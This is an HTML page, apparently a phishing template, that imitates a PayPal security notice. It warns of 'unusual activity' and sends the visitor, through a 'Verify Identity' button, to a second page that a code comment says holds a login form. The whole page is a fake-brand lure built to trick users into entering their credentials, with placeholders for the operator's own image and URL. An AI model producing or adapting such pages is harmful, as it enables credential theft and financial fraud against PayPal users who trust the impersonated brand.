<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>PayPal Security Verification</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f2f2f2;
            margin: 0;
            padding: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }
        .container {
            background-color: #f5f5f5;
            padding: 20px;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            max-width: 400px;
            width: 100%;
            text-align: center;
        }
        h2 {
            color: #0079c1;
        }
        p {
            color: #666;
            margin-bottom: 20px;
        }
        img {
            max-width: 100%;
            height: auto;
            margin-bottom: 20px;
        }
        button {
            background-color: #0079c1;
            color: white;
            padding: 10px 20px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            transition: background-color 0.3s ease;
        }
        button:hover {
            background-color: #005f91;
        }
    </style>
</head>
<body>
    <div class="container">
        <img src="your_image_filename.jpg" alt="PayPal Logo">
        <h2>PayPal Security Verification</h2>
        <p>We have detected some unusual activity on your account and require additional verification to ensure the security of your account.</p>
        <button onclick="redirectToLogin()">Verify Identity</button>
    </div>

    <script>
        function redirectToLogin() {
            window.location.href = "page2.html"; // Replace "page2.html" with the URL of your second page containing the login form
        }
    </script>
</body>
</html>